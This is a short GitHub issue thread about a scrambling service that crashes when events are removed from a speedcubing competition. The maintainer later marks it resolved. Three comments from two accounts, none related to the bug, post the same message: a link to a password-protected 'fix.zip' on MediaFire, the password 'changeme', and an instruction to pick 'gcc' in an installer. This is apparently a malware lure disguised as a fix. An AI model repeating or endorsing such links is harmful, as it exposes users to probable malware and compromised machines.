### ISSUE TITLE
Can't remove/add events and clock scrambles for Weekly Competition 18 were not generated

### ISSUE THREAD

**Issue by jakubdrobny** [jakubdrobny/speedcubingslovakia#100]
scrambling service crashes on competition edit removing events

**Comment by TechHorizon2003** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by rphmauriciodev** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by TechHorizon2003** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by jakubdrobny** [comment]
resolved
